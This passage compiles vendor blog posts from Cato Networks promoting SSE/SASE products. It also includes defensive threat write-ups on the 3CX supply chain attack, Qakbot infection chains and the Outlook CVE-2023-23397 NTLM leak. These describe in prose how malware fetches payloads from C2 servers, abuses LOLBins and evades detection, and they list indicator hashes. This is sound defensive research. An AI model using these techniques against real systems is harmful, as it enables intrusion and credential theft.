By rolling out SSE to our customers, our ultimate goal is to provide them with a seamless journey towards improving their organization's security posture. Most IT leaders are aware that in this era of constant digital change, businesses must make room for greater cloud migration, rising remote work demands and new security threats. SSE will help futureproof their network security by migrating away from outdated and disjointed security solutions that are limited in their ability to support customer and employee needs for greater use of cloud resources.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Download the White Paper [/boxlink]
Why did you choose Cato's SSE platform?
Partnering with Cato Networks was no doubt the right decision for Windstream Enterprise. While we considered multiple technology partners, Cato's solution was the only fully unified cloud-native solution. This architecture enables businesses to eliminate point solutions and on-premises devices by integrating the best available security components into their existing network environments without disruption. This partnership allowed us to enter the Secure Access Service Edge (SASE) and SSE market fast and be a key part of it as security needs continue to rapidly evolve.
Cato Networks is different from the competition because it was built to be a cloud-native SASE solution. As such, Cato's technology offers a better customer experience with greater visibility across the platform, as well as artificial intelligence that can swiftly evaluate all security layers and provide a faster resolution to security breaches and vulnerabilities.
Partnering with Cato has given us quite a competitive edge—and it's not just about the technology (although it's a big part of it); we feel that we get the unique opportunity to partner with the inventor of a true 360-degree SASE platform. Cato's SSE solution pairs perfectly with our professional services and market-leading service portfolio—backed by our industry-first service guarantees and our dedicated team of cybersecurity experts. We could not be more pleased with this partnership and look forward to what the future will bring.
You're already offering SASE, powered by Cato Networks. How will this be different?
SSE is a subset to SASE, which is meant to describe the convergence of cloud security functions. SASE takes a broader and more holistic approach to secure and optimized access by addressing both optimization of the user experience and securing all access and traffic against threats, attacks, and data loss.
What we've announced has similarities with a SASE solution in almost every way, but unlike SASE, an SSE solution can by overlayed onto any existing network, such as a SD-WAN, allowing it to be deployed near-immediately to secure all endpoints, users and applications. Because of this, SSE brings an added level of simplicity in that no network changes are required to implement this security framework.
What is driving the demand for solutions like SSE and SASE?
Gartner has predicted that "By 2025, 80% of organizations seeking to procure SSE-related security services will purchase a consolidated SSE solution, rather than stand-alone cloud access security broker, secure web gateway and ZTNA offerings, up from 15% in 2021." These means there are many enterprises that are, or soon will be, searching for a comprehensive SSE solution. And since security for networks, applications and data continues to be a top concern for most C-level and IT executives, there are several reasons backing the strong demand for SSE and SASE:
Cybercriminals are becoming incredibly sophisticated in the ever-expanding threat landscape, and data breaches come with high price tags that can damage brand reputations and wallets.
Legacy networks were built around physical locations that don't scale easily. because they are premises based. Premises-based disjointed point solutions from multiple vendors often require manual maintenance.
With more applications moving to the cloud, SSE is a cloud-native framework specifically built for modern work environments (hybrid and remote). It delivers a self-maintaining service that continuously enhances all its components, resulting in reduced IT overhead and allowing enterprises to shift focus to business-critical activities. It also no longer makes sense for businesses to backhaul internet traffic though data center firewalls.
What can customers gain from a managed SSE solution?
SSE is a proven way to improve an organization's security posture by establishing a global fabric that connects all edges into a unified security platform and enables consistent policy enforcement. By choosing a managed SSE solution, you get near-instant protection on any network—integrating the best available cloud-native security components from Cato Networks into your existing network environment without any disruption. Customers gain this ironclad security architecture that seamlessly implements zero trust access, ensuring that all users only have access to company-authorized applications and relentlessly defends against anomalies, cyberthreats and sensitive data loss. And with Windstream Enterprise as your managed service provider for Cato's SSE technology, you get complete visibility via our WE Connect portal, along with the opportunity to integrate this view with additional Windstream solutions, such as OfficeSuite UC® for voice and collaboration and SD-WAN for network connectivity and access management. That means one single interface to control all your IT managed services—backed by industry-first service guarantees—to create real help you succeed in your businesses, on your terms.
Not to mention, we will act as an extension of your security team—so, not only do you seamlessly integrate these security components into one comprehensive offering, but you can rely on one trusted partner to deliver it all, with white glove support from our dedicated team of Cybersecurity Operations Center (CSOC) experts. This goes along way for organizations who are looking to increase their cybersecurity investments, while also adhering to the limitations posed by the ongoing IT skills gap that is leading to shrinking IT and Security teams.
To learn more about SSE from Windstream Enterprise, powered by Cato Networks technology, visit windstreamenterprise.com/sse
Most SSE solutions can support moving branch security to the cloud. But only a few can securely cloudify the datacenter firewall. This is because datacenter...
Which SSE Can Replace the Physical Datacenter Firewalls? Most SSE solutions can support moving branch security to the cloud. But only a few can securely cloudify the datacenter firewall. This is because datacenter firewalls don’t just address the need for secure Internet access, which is the main SSE capability. Rather, these firewalls are also used for securing WAN access, datacenter LAN segmentation and ensuring reliability and high availability to network traffic.
In this blog post, we explore which capabilities a datacenter firewall-replacing SSE needs to have. To read a more in-depth explanation about each capability, go to the eBook this blog post is based on.
Replacing the Datacenter Firewall: SSE Criteria
An SSE solution that can replace the datacenter firewall should provide the following capabilities:
1. Secure Access to the Internet
SSE needs to secure access to the internet. This is done by analyzing and protecting all internet-bound traffic, including remote user traffic, based on rules IT sets between network entities. In addition, SSE will include an SWG for monitoring and controlling access to websites. Finally, SSE will have built-in threat prevention, including anti-malware and IPS capabilities as a service.
2. Secure Access From the Internet
While many SSE solutions use proxy architectures to secure outbound Internet traffic, SSE solutions that can replace the datacenter firewall are built from the ground up with an NGFW architecture. This enables them to secure traffic directed at datacenter applications and also direct traffic to the right server and applications within the WAN.
[boxlink link="https://www.catonetworks.com/resources/which-sse-can-replace-the-physical-datacenter-firewalls/"] Which SSE Can Replace the Physical Datacenter Firewalls? | Download the White Paper [/boxlink]
3. Secure WAN Access
A WAN firewall controls whether traffic is allowed or blocked between organizational entities. The SSE-based WAN firewall can also leverage user awareness capabilities and advanced threat prevention.
4. Secure LAN Access
SSE should secure VLAN traffic using access control and threat prevention engines. This must be done at the nearest SSE PoP to avoid latency. There also needs to be an option to route the traffic via an on-premise edge appliance.
In addition to these capabilities, SSE needs to have visibility into the entire network. The visibility enables protecting WAN traffic and remote users accessing internal applications and the governance of applications, ports and protocols.
Cato’s SSE 360 solution, built on a cloud-native architecture, secures traffic to all edges and provides full network visibility and control. Cato’s SSE 360 deliveres all the functionality a datacenter firewall provides, including NGFW, SWG, advanced threat protection and managed threat detection and response.
To learn more, read the eBook “Which SSE Can Replace the Physical Datacenter Firewalls”, right here.
Supply chain attacks are one of the top concerns for any organization as they exploit (no pun intended) the inherited trust between organizations. Recent examples...
The 3CX Supply Chain Attack – Exploiting an Ancient Vulnerability Supply chain attacks are one of the top concerns for any organization as they exploit (no pun intended) the inherited trust between organizations. Recent examples of similar attacks include SolarWinds and Kaseya. On March 29th, a new supply chain attack was identified targeting 3CX, a VoIP IPXS developer, with North Korean nation-state actors as the likely perpetrators.
What makes the 3CX attack so devastating is the exploitation of a 10-year-old Microsoft vulnerability (CVE-2013-3900) that makes executables appear to be legitimately signed by Microsoft while, in fact, they are being used to distribute malware. This is not the first time this vulnerability has been exploited; earlier this year, the same tactic was used in the Zloader infection campaign. In the 3CX case, the two “signed” malicious DLLs were used to connect to a C&C (Command and Control) server and ultimately connect to a GitHub repository and download an information stealing malware that targets sensitive data users type into their browser.
[boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink]
The Cato Networks security group responded to this threat immediately. Customers whose systems were communicating with the second-stage payload server were contacted and informed of which devices were compromised. All domains and IPs associated with the campaign were blocked to limit any exposure to this threat.
Cato’s approach to such threats is one of multiple choke points, ensuring the threat is detected, mitigated, and prevented along its entire attack path. This can only be done by leveraging the private cloud backbone in which each PoP has the entire security stack sharing and contextualizing data for each network flow. Cato’s mitigation of the 3CX threat includes:
Malicious domains are tagged as such and are blocked. The firewall rule for blocking malicious domains is enabled by default.
IPS (Intrusion Prevention System) – Payload servers were added to the domain blocklist, this is complimentary to the firewall rules and is not dependent on them being enabled.
Anti-malware – All 3CX associated trojans are blocked
MDR (Managed Detection and Response) – the MDR team continues to monitor customer systems for any suspicious activities.
Cato Networks security group will continue to monitor this threat as it develops. For a detailed technical analysis of the attack see Cyble’s blog.
The world of cybersecurity is a never-ending battle, with malicious actors constantly devising new ways to exploit vulnerabilities and infiltrate networks. One such threat, causing...
The Evolution of Qakbot: How Cato Networks Adapts to the Latest Threats The world of cybersecurity is a never-ending battle, with malicious actors constantly devising new ways to exploit vulnerabilities and infiltrate networks. One such threat, causing headaches for security teams for over a decade, is the Qakbot Trojan, also known as Qbot. Qakbot has been used in malicious campaigns since 2007, and despite many attempts to stamp it out, continues to evolve and adapt in an attempt to evade detection.
Recently, the Cato Networks Threat Research team analyzed several new variants of Qakbot that exhibited advanced capabilities and evasive techniques to avoid detection and quickly built and deployed protection for the additional changes into the Cato Networks IPS. In this analysis, Cato Networks Research Team exposes the tactics, techniques, and procedures (TTPs) of the latest Qakbot variant and explores its potential impact on enterprises and organizations if left alone.
During the COVID-19 pandemic, an eruption of cyberattacks occurred, including significant growth of attacks involving ransomware. As part of this surge, Qakbot’s threat actor adapted and paired with other adversaries to carry out ferocious multi-stage attacks with significant consequences.
Qakbot is sophisticated info-stealing malware, notorious as a banking trojan, and is often used to steal financial information and conduct fraudulent financial transactions. Pursuing even larger gains, in the last few years, Qakbot targets have shifted from retail users to businesses and organizations.
As recent versions of Qakbot emerge, they present new infection techniques to both avoid detection and maintain persistence on the infected systems. Qakbot’s latest design updates, and additionally complex multi-stage infection processes, enable it to evade detection using most traditional security software detection techniques, and pose a significant and ongoing threat to unprotected businesses and organizations.
How Do the Latest Versions of Qakbot Work?
The first stage of the Qakbot infection process begins when a user clicks on a link inside a malicious email attachment. In the latest Qakbot versions, the malicious file attachments are typically ZIP, OneNote or WSF files (a file type used by the Microsoft Windows Script Host.). Zip, OneNote and WSF files are commonly used by malicious actors as they make it easier to evade the Mark of the Web (MOTW). MOTW is a security mechanism implemented by Microsoft to detect and block files with macros (such as Excel files) that were downloaded from the internet and may be compromised. By using file types that do not receive MOTW, Qakbot attachments are more likely to evade detection and blocking.
When the user opens the WSF or OneNote file and clicks the embedded link, Qakbot covertly launches a series of commands, allowing the malware to infect the system and take additional measures to evade detection.
[boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink]
Malicious files are cloaked as innocuous files by abusing Living Off the Land Binaries (LOLBins) and by imitating commonly used file types, such as Adobe Cloud files, to stay hidden. LOLBins are legitimate binaries or executables found in the Windows operating system that are also used by attackers to carry out malicious activities. These binaries are typically present on most Windows machines and are legitimately used for system maintenance and administration tasks but can easily be abused to execute malicious code or achieve persistence on compromised systems. Attackers commonly make use of LOLBins because they are present on most Windows systems and are typically on the allow list of common security software, making them more difficult to detect and block. Examples of common LOLBins include cmd.exe, powershell.exe, rundll32.exe and regsvr32.exe.
After the initial infection stage is complete, Qakbot expands its footprint on the infected system and eventually uses encrypted communication with Qakbot command and control (C2) servers to further conceal its activities and evade detection.
An example of a shared malicious PDF attachment instructing the victim to execute the bundled .wsf file
Let’s explore four different recent Qakbot infection scenarios to learn exactly how they operate.
Scenario 1: Malicious email with an embedded .hta file, hidden within a OneNote file attachment, leading to multi-stage infection process:
From the malicious email, the user (victim), is led to click a malicious link hidden inside a legitimate looking OneNote file attachment. After clicking the link, the infection chain begins.The malicious link is in actuality, an embedded .hta file, executed when the link is clicked. The .hta file includes a VBscript code used to deliver the Qakbot payload and infect the device. Windows uses MSHTA.exe to execute .hta files. Typically, MSHTA.exe is used legitimately to execute HTML applications, and that is why this process usually evades detection as being malicious.
Embedded malicious .hta file using VBScript to execute commands on the operating system
After the .hta file is initiated, it executes curl.exe to force download an infected dll file from a remote C2 Qakbot server. The Qakbot payload is disguised as an image file to evade detection during the download process. Curl is another normally legitimate tool, used for transferring data over the internet.
De-obfuscated code from the .hta file showing the execution of curl.exe and the Qakbot payload
The .hta file then executes the Qakbot dll file using rundll32.exe.Rundll32.exe is another normally legitimate Windows application used to run DLL files. In this scenario, executing rundll32.exe allows the malicious DLL file, disguised as an image, to be successfully loaded into the system, undetected.
Example of Qakbot’s infection chain
Loaded onto the system successfully, Qakbot then hides itself by spawning a new process of wermgr.exe and injecting its code into it. Wermgr.exe is a legitimate Windows Event Log application. Masquerading as a legitimate process enables the malware to run in the background and avoid detection by most common anti-virus software.
Scenario 2: Like Scenario 1, but in this variation, a malicious email with an embedded .cmd file is hidden within a OneNote file attachment, leading to a multi-stage infection process.
From the malicious email, the user (victim), is led to click the malicious link hidden inside a legitimate OneNote file attachment. After clicking the link, Qakbot begins the infection chain.The malicious link is in actuality, an embedded .cmd file, and executes when the link is clicked. Windows uses CMD.exe to execute the .cmd file. CMD.exe is a legitimate command-line interpreter, used to execute commands in Windows operating systems. Being a LOLBin, this process is usually abused to evade detection.
.cmd file content
The .cmd file invokes PowerShell to force download an encrypted payload from a remote Qakbot C2 server.PowerShell is a powerful scripting language built into Windows operating systems and is typically used for task automation.
Decoded base64 string from the .cmd script
The downloaded payload dll file is executed using Rundll32.exe, with the same purpose as in the previous scenario.
Loaded onto the system successfully, Qakbot then hides itself by spawning a new process of wermgr.exe and injecting its code into it.
Scenario 3: Malicious email with a Zip attachment bundling a .WSF (Windows Script File) file.
In this variation, a malicious email with an infected WSF file is hidden within a Zip attachment designed to mimic an Adobe Cloud certificate. The Zip file often has a legitimate-looking name and is specifically designed to trick the user (victim) into thinking the attachment is safe and harmless.
From the malicious email, the user (victim), is led to open the attachment and extract the files it bundles. Inside the Zip there are 3 files: .WSF, PDF and TXT. The PDF and TXT are decoy files, leading the user to click and open the .WSF file, initiating the infection chain.Typically, .WSF files contain a sequence of legitimate commands executed by Windows Script Host. In this case, the WSF file contains a script that executes the next stage of the Qakbot infection process.
The obfuscated script executes the Qakbot dll using Rundll32.exe.
Loaded onto the system successfully, Qakbot moves to hide itself, spawning a new wermgr.exe process and injecting its code into it.
Scenario 4: Malicious email with .html attachment using the HTML Smuggling techniqueHTML Smuggling is a technique that allows threat actors to smuggle malicious binary code into a system by cloaking the malicious binary within an innocuous looking .html attachment.
From the malicious email, the user (victim), is led to open the innocuous looking .html attachment containing the hidden binary. In some cases, the .html file arrives within a ZIP archive file, adding an additional step to the complexity of the attack.
Once opened, the .html file delivers a malicious, password-protected, .ZIP archive file stored within the code of the attachment. The file password is provided in the .html file.
Malicious .html file – fooling the victim into opening the password-protected .ZIP file
Inside, the .ZIP archive file, a malicious .img file is bundled.IMG are binary files that store raw disk images of floppy disks, hard drives, or optical discs. IMG and ISO files are commonly used legitimately to install large software. In the case of Qakbot, once the IMG file is loaded, it mounts itself as a drive and exposes its contents.
The malicious .img file actually bundles several other files, including a .LNK (Windows shortcut file) file. Executing the .LNK file initiates the complex infection chain using the other files within the mounted .img file.
During the infection chain, a malicious .WSF file is executed, invoking PowerShell to force download an encrypted payload (the Qakbot dll) from a remote Qakbot C2 server. PowerShell is a powerful scripting language built into Windows operating systems and is typically used for task automation.
Request to download Qakbot’s dll from the C2 server using PowerShell
The .WSF script then executes the Qakbot dll using Rundll32.exe.
Loaded onto the system successfully, Qakbot moves to hide itself, spawning a new wermgr.exe process and injecting its code into it.
After Qakbot infects a system, the malware evaluates and performs reconnaissance on the infected environment. If the environment is worthwhile, Qakbot downloads additional tools, such as Cobalt Strike or Brute Ratel frameworks. These frameworks are commercially used by Red Teams for penetration testing purposes.
Unfortunately, leaked versions of many penetration testing frameworks have also found their way to the open market and are abused by threat actors. Using these tools, threat actors perform advanced post-exploitation actions, including privilege escalation, and lateral movement.
Eventually, the greatest threat posed by Qakbot and similar families of malware is ransomware. In some of the most recent attacks, Qakbot has been observed delivering BlackBasta ransomware. BlackBasta is a notoriously effective ransomware variant, used to successfully attack many businesses throughout the US and Europe. BlackBasta uses the double extortion technique, where an attacker demands a ransom payment to restore the victim’s access to their own encrypted files and/or data and threatens to sell the user or organizational data on the Darknet if the ransom is not paid.
Cato Networks internal security team dashboard displays a suspected attempt to exfiltrate data
How Cato Protects You Against Qakbot
Qakbot, like other malware, is constantly evolving and being updated with new methods and attempts at infection and infiltration. Making sure your current threat detection solution can detect and block these types of changes to malware threats as quickly as possible is critical to your ongoing organizational security. Cato Networks IPS (Intrusion Prevention System) was immediately updated with the latest changes to Qakbot in order to block the malware from communicating with its C2 servers.Cato’s Security Research team uses advanced tools and strategies to detect, analyze and build robust protection against the latest threats. The following dashboard view is part of an arsenal of tools used by the Cato Research Team and shows auto-detection of a suspected Qakbot attack and blocking by Cato IPS from any additional communication between the malware and its C2 servers.
Cato Networks internal security team dashboard displaying detection and blockage of outbound Qakbot communication
It has never been clearer that no company can expect to fight the constant evolution of malware and malicious attacks without help from the experts. Cato’s Security Research team remains committed to continuously monitoring and updating our solutions to protect your organization against the latest threats. Utilizing the Cato Networks solution, enjoy an enhanced overall security posture, safeguard against the ever-evolving threat of malware, and confidently prioritize what truly matters - your business.To learn more about how Cato protects against Qakbot and similar threats and intrusions and how you can mitigate security risks for your organization, check out our articles on intrusion prevention, security services, and managed threat detection and response.
Indicators of compromise (IOCs)
352a220498b886fae5cd1fe1d034fe1cebca7c6d75c00015aca1541d19edbfdf - .zip
5c7e841005731a225bfb4fa118492afed843ba9b26b4f3d5e1f81b410fa17c6d - .zip
002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c - .one
d1361ebb34e9a0be33666f04f62aa11574c9c551479a831688bcfb3baaadc71c - .one
9e8187a1117845ee4806c390bfa15d6f4aaca6462c809842e86bc79341aec6a7 - .one
145e9558ad6396b5eed9b9630213a64cc809318025627a27b14f01cfcf644170 - .hta
baf1aef91fe1be5d34e1fc17ed54ea4f7516300c7b82ebf55e33b794c5dc697f - .hta
1b553c8b161fd589ead6deb81fdbd98a71f6137b6e260c1faa4e1280b8bd5c40 - .one
e1f606cc13e9d4bc4b6a2526eaa74314f5f4f67cea8c63263bc6864303537e5f - .one
06a3089354da2b407776ad956ff505770c94581811d4c00bc6735665136663a7 - .cmd
5d03803300c3221b1233cdc01cbd45cfcc53dc8a87fba37e705d7fac2c615f21 - .cmd
1b3b1a86a4344b79d495b80a18399bb0d9f877095029bb9ead2fcc7664e9e89c - .zip
523ea1b66f8d3732494257c17519197e4ed7cf71a2598a88b4f6d78911ad4a84 - .zip
fe7c6af8a14af582c3f81749652b9c1ea6c0c002bb181c9ffb154eae609e6458 - .wsf
6d544064dbf1c5bb9385f51b15e72d3221eded81ac63f87a968062277aeee548 - .wsf
3c8591624333b401712943bc811c481b0eaa5a4209b2ec99b36c981da7c25b89 - .html
8c36814c55fa69115f693543f6b84a33161825d68d98e824a40b70940c3d1366 - .html
2af19508eebe28b9253fd3fafefbbd9176f6065b2b9c6e6b140b3ea8c605ebe8 - .html
040953397363bad87357a024eab5ba416c94b1532b32e9b7839df83601a636f4 - .html
42bd614f7452b3b40ffcad859eae95079f1548070980cab4890440d08390bd29 - .zip
08a1f7177852dd863397e3b3cfc0d79e2f576293fbb9414f23f1660345f71ccc – .zip
0d2ad33586c6434bd30f09252f311b638bab903db008d237e9995bfda9309d3a - .zip
878f3ccb51f103e00a283a1b44bb83c715b8f47a7bab55532a00df5c685a0b1d - .zip
B087012cc7a352a538312351d3c22bb1098c5b64107c8dca18645320e58fd92f - .img
A new critical vulnerability impacting Microsoft Outlook (CVE-2023-23397) was recently published by Microsoft. The CVE is particularly concerning as no user involvement is required by...
Cato Protects Against CVE-2023-23397 Exploits A new critical vulnerability impacting Microsoft Outlook (CVE-2023-23397) was recently published by Microsoft. The CVE is particularly concerning as no user involvement is required by the exploit. Once a user receives a malicious calendar invite, the attacker can gain a user’s Active Directory credentials.
Microsoft has released a security update that can be found here. Cato Research strongly encourages updating all relevant systems as proof-of-concept exploits have already appeared online. Until all systems have been updated, Cato customers can rest easy. By default, any Cato-connected endpoint – remote user, site, or any other type of user – is protected from the attacks exploiting the CVE.
What is CVE-2023-23397 and How Does it Work?
CVE-2023-23397 is a critical vulnerability in the Outlook client. An attacker can craft a .MSG file as a e form of a calendar invite that triggers an authentication attempt over the SMB protocol to an attacker-controlled endpoint without any user interaction. (.MSG is the file format used to represent Outlook elements, such email messages, appointments, contacts, and tasks.)
In case the SMB authentication attempt is done using NTLM, the Outlook client will send the attacker a Net-NTLM hash along with the username and domain name. This enables an attacker to perform an offline dictionary-based attack on the hash. The result: revealing the user's password and username that can then be used to authenticate and attack exposed services that rely on active directory credentials.
[boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink]
What is Cato’s Mitigation?
Right upon the exploitation disclosure, Cato’s Security Research team began investigating the CVE. Cato IPS does not inspect the Outlook .MSG elements as that would be out of scope for an IPS system. But the CVE does require an outbound SMB session to exfiltrate data and, by default, Cato’s firewall implements a deny rule, blocking outbound SMB traffic. Only SMB sessions terminating at known, trusted servers should be allowed.
Our team continues to review a dedicated IPS signature to be enforced globally for this threat. It will ensure that potential information leakage, such as the one presented by this CVE, is prevented regardless of their firewall configuration. With hybrid Active Directory setups that extend AD identities to the cloud and may utilize SMB, careful review of the data is required to avoid causing false positives introduced by legitimate usage. Further notice will be provided to Cato customers in forthcoming Release Notes.
Many enterprises today are exploring the benefits of Secure Access Service Edge (SASE). SASE is a modern networking and security solution for enterprises that converges...
Are You Trapped in the Upside-Down World of Networking and Security? Many enterprises today are exploring the benefits of Secure Access Service Edge (SASE). SASE is a modern networking and security solution for enterprises that converges SD-WAN and network security solutions like NGFW, IPS, and NGAM. SASE provides a single, unified and cloud-native network and security service that is adapted to current and future technology and business needs.
Despite the availability and increasing of SASE, some enterprises still maintain legacy appliances for their networking and security needs. Such businesses are trapped in an upside-down world that operates in technology silos and requires countless IT resources to deploy, manage, and maintain.
In this blog post, we will compare old-fashioned point solutions from the upside-down world to Cato’s modern SASE Cloud. We’ll examine the following five characteristics:
The Hardware Refresh Cycle
To read more about each characteristic, you’re welcome to read the eBook SASE vs. the Upside Down World of Networking and Security this blog post is based on.
Characteristic #1: Network Devices
Let’s first compare network devices. Network devices are the physical appliances that enable connectivity and security in the network.
Network Devices in the Upside-down World:
Difficult to maintain and monitor
Logistical and supply chain issues
Cato Socket in the SASE World:
Simple to use
No supply chain issues
Characteristic #2: High Availability
Next, let’s look at high availability. High availability is about ensuring the network is always accessible, regardless of outages, natural disasters, misconfigurations, or any other unforeseen event.
High Availability in the Upside-down World:
Costly to buy redundant hardware
Scalability is limited to box capacity
Requires hours of management and troubleshooting
Prone to configuration errors
High Availability in SASE World:
A frictionless process
Simplicity that reduces risk
[boxlink link="https://www.catonetworks.com/resources/sase-vs-the-upside-down-world-of-networking-and-security/"] SASE vs. the Upside Down World of Networking and Security | Download the eBook [/boxlink]
Characteristic #3: Security Updates
No comparison would be complete without addressing security. With so many cyberthreats, security is an integral part of any enterprise IT strategy. But IT’s task list is filled to the brim with multiple competing priorities. How can businesses ensure security tasks aren’t pushed to the bottom of the list?
Security Updates in the Upside-down World:
Cumbersome and complex
Disruptive to the business
Requires manual intervention for “automated” tasks
Higher risk of failure
Security Updates in SSE 360 World:
Hourly automatic updates from 250+ security feeds
Transparent to the user
Minimal false positives
IT and security have time to work on other business-critical projects
Characteristic #4: Hardware Refresh Cycle
When hardware becomes obsolete or can no longer satisfy technology or capacity requirements, it needs to be evaluated and upgraded. Otherwise, productivity will be impacted, security will be compromised, and business objectives will not be met. The Hardware Refresh Cycle in the Upside-down World:
A slow, time-consuming process
Dependent on the global supply chain
Can be blocked by budgets or politics
Requires extra IT resources
The Hardware Refresh Cycle in SASE World:
A one time process - SASE scales, is continuously updated and suitable for multiple use cases
Easily adopt new features
Unlimited on-demand scalability
Flexible, cost-effective pricing models and easy to demonstrate ROI
Reduces administrative overhead
Characteristic #5: TLS Inspection
Finally, TLS inspection prevents hackers from performing reconnaissance or progressing laterally by decrypting traffic, inspecting it and then re-encrypting it.
TLS Inspection in the Upside-down World:
Scoping, acquiring, deploying and configuring more hardware
Backhauling traffic for firewall inspection
Increased certificate management
Requires higher throughput
TLS Inspection in SSE 360 World:
Wire speed performance
Consistent TLS inspection
Quick and easy setup
Simple deployment at scale
Minimal resources required
Getting Out of the Upside-Down World
With SASE, enterprises can ensure they are never trapped in an upside-down world of cumbersome legacy appliances. SASE provides business agility, on-demand scalability, and 360-degree security along with simplified management and maintenance for IT and security teams. The cloud-native SASE architecture connects and secures all resources and edges, anywhere in the world, based on identity-driven access.
To read more about the differences between legacy appliances and SASE (and how to rescue yourself) read the eBook SASE vs. the Upside Down World of Networking and Security.
Corporate IT infrastructure has become crucial to the success of the modern business. Disruption in the availability of corporate applications and services will impact employee...
The Value of Network Redundancy Corporate IT infrastructure has become crucial to the success of the modern business. Disruption in the availability of corporate applications and services will impact employee productivity and business profitability.
Companies are responsible for the resiliency of their own IT systems and this includes ensuring the constant availability of critical business applications for employees, customers, and partners. Network outages are possible; however, how rapidly the network recovers with minimal disruption to the business is what matters most.
Network redundancy is designed to limit the risk of a network outage halting business operations. Building resiliency and redundancy into the corporate network enables an organization to rapidly recover and maintain operations.
Impact of Network Redundancy
Network redundancy is designed to ensure that no single point of failure exists within an organization’s network infrastructure. This benefits the modern business in numerous ways:
Security: Network outages occur, and the impact can be measured in numerous ways, including the network security impact. Network outages caused by DDOS or other such attacks will have a significant impact on day-day business operations, affecting branch and remote workers, thus impacting some of their enterprise security protection. Such incidents are also used to launch stealth attacks on critical business systems to further damage business operations. Network redundancy improves security by providing alternate routes for impacted network traffic, thus reducing the chances of experiencing outages that place business resources and the network at risk.
Performance: If an organization is dependent on a single network link or carrier, then its network performance is only as good as that carrier’s network. If the provider suffers an outage or degraded performance, so does the company. Network redundancy can enable an organization to optimize its use of multiple network carriers to avoid outages or degraded service.
Reliability: The primary purpose of network redundancy is to eliminate single points of failure that can cause outages or degraded performance. Redundancy improves resiliency by limiting the potential impact if a system or service goes down.
How Redundancy in Cato’s Architecture Works
The Cato SASE Cloud is composed of a global network of points of presence (PoPs) that are connected via multiple Tier-1 network providers. When traffic enters the Cato SASE Cloud, a PoP performs security inspection, applies all policies, and optimally routes the traffic to the PoP nearest its destination.
The design of the Cato SASE Cloud provides multiple layers of redundancy to ensure consistent service availability. As a result, it is highly resilient against several types of failures, including:
Carrier Outage: The Cato SASE Cloud was designed using multiple tier-1 carriers to connect its PoPs and provide reliable, high-performance network connectivity. If a carrier’s service begins to degrade, the PoPs will automatically detect this and failover to an alternate carrier to maintain optimal performance and availability.
InterPoP Outage: The Cato SASE Cloud is composed of a network of PoPs in 75+ global locations. If a PoP experiences an outage, all services running inside this PoP will automatically failover to the nearest available PoP, and all traffic to that PoP will automatically reroute to the nearest available PoP.
Intra-PoP Outage: A PoP consists of a collection of Cato Single Pass Cloud Engines (SPACE) that powers the global, scalable, and highly resilient Cato SASE Cloud. Multiple SPACE instances run inside of multiple high powered compute nodes inside each PoP. If one SPACE instance fails, it will failover to another instance within the same compute node. If a compute node fails, all SPACE instances will failover to another compute node inside the same PoP.
Cato Sockets: Each Cato Socket has multiple WAN ports and can run in active/active/active mode. When deployed as redundant hardware, a socket’s traffic will failover to the redundant socket if it fails. And, in the event the Cato SASE Cloud experiences an unlikely complete outage, , Cato sockets can provide direct WAN connectivity over the public Internet.
Network outages can have a dramatic impact on an organization’s ability to conduct normal business. Cato’s network design protects against potentially catastrophic outages of the Cato SASE Cloud network.
[boxlink link="https://www.catonetworks.com/resources/how-to-best-optimize-global-access-to-cloud-applications/"] How to Best Optimize Global Access to Cloud Applications | Download the eBook [/boxlink]
The Advantage of Cato’s Network Redundancy
Network redundancy is a significant consideration when comparing network options. Often, it was one of the main selling points for older network technologies like multi-protocol label switching (MPLS) and software-defined WAN (SD-WAN) solutions.
MPLS, SD-WAN, and the Cato SASE Cloud all achieve network resiliency in different ways.
MPLS: MPLS is known for its middle-mile resiliency and redundancy since traffic flows through the MPLS provider’s internal systems. However, the cost of MPLS circuits often makes redundant circuits for last-mile coverage cost-prohibitive.
SD-WAN: SD-WAN solutions are designed to optimally route traffic over the public Internet to provide improved performance and reliability at a fraction of the cost of MPLS. However, these solutions are limited by the performance and resiliency of the public Internet, making it challenging for them to meet the same SLAs as an MPLS solution.
Cato SASE Cloud: The Cato SASE Cloud provides high middle-mile performance and resiliency via a global network of PoPs with built-in redundancy and traffic optimization, and connected via tier-1 carriers. Cato Sockets have multiple WAN ports in active/active/active mode, allowing customers to connect multiple last-mile service providers, allowing them to implement inexpensive last-mile redundancy.
The Cato SASE Cloud offers better overall network resiliency than MPLS and SD-WAN, and it accomplishes this at a fraction of the price of MPLS.
Improve Company Productivity and Security with Cato
Corporate networks are rapidly expanding and becoming more dynamic. As more companies allow hybrid working options, they need to ensure that these employees have a reliable, secure, high-performance network experience no matter where they are connecting from.
The Cato SASE Cloud is a converged, cloud-native, global connected architecture that provides high-performance network connectivity with built-in multi-layer redundancy for all users, devices, and applications. This protects organizations against crippling network outages and ensures predictable network availability with a 99.999% SLA.
Building a highly resilient and redundant corporate network helps to improve company productivity and security. Learn more about SASE and about enhancing your organization’s network resiliency by requesting a free demo of the Cato SASE Cloud today.
SASE (Secure Access Service Edge) is a new architecture that converges networking and security into cloud-native, globally available service offerings. Security inspection and policy enforcement...
Integrated vs. Converged SASE: Which One Ensures an Optimal Security Posture? SASE (Secure Access Service Edge) is a new architecture that converges networking and security into cloud-native, globally available service offerings. Security inspection and policy enforcement is performed at the cloud edge, instead of backhauling all traffic to a centralized data center for inspection. This enables organizations to strengthen their security posture while ensuring high performance, scalability and a good user experience.
Unfortunately, many vendors attempt to market loosely integrated products and partnerships as SASE. they find the fastest way to enter the SASE market is to virtualize existing hardware-based products and deploy them into public cloud providers (AWS, Azure, GCP). and then enhance them with additional capabilities.
So, which approach is best? In this blog post we explore the two options, converged and integrated, and the differences between them. To learn more about which SASE vendor you should choose you can read the whitepaper this blog post is based on: “Integrated vs. Converged SASE: Why it Matters When Ensuring an Optimal Security Posture”.
Why Do Some SASE Vendors Offer an Integrated SASE Solution?
Integrating siloed point solutions is the fast track to entering the SASE market. But this type of solution is full of drawbacks. These include:
